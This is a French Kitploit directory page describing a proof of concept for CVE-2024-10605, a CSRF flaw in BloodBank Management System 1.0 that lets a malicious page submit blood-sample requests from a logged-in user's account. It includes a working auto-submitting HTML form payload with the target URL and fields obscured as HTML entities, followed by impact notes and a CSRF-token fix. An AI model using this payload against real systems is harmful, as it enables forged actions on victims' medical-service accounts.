Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10605 — Preuve de concept pour CVE-2024-10605, une vulnérabilité CSRF dans BloodBank Management System 1.0 permettant des demandes d'échantillons sanguins non autorisées. | Kitploit
Outils/GitHubGitHub/bevennyamande/cve-2024-10605
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

Preuve de concept pour CVE-2024-10605, une vulnérabilité CSRF dans BloodBank Management System 1.0 permettant des demandes d'échantillons sanguins non autorisées.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Version affectée :

  • BloodBank Management System: 1.0

Informations sur la vulnérabilité :

  • Type de vulnérabilité : Cross Site Request Forgery (CSRF)
  • Sévérité : HIGH
  • Statut : Non corrigé

Point de terminaison vulnérable :

  • Chemin : file/request.php

Description de la vulnérabilité :

Il existe une Cross Site Request Forgery sur ce point de terminaison /file/request.php qui permet à un utilisateur distant d'initier une demande d'échantillon de sang sur le compte d'un connecté, à partir des échantillons de sang disponibles d'un hôpital sélectionné.

destinataire

Une exploitation réussie peut entraîner des actions non autorisées au nom de la victime. De plus, cela pourrait être exploité en visitant des sites web malveillants contenant la charge utile.


Preuve de concept (PoC) :

Voici un exemple d'attaque CSRF PoC qui initie une demande d'échantillon de sang à partir du compte d'un destinataire connecté :

root@kitploit:~

<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






Impact :

  • Manipulation des données : Les attaquants pourraient modifier le contenu affiché aux utilisateurs.
  • Atteinte à la réputation : Les utilisateurs pourraient perdre confiance dans le système en raison d'un comportement malveillant.

Recommandations d'atténuation :

  1. Utilisez un jeton CSRF Mettez en œuvre un mécanisme pour dissuader l'accès inter-domaines ou placez des jetons CSRF dans votre requête.

Télécharger l’outil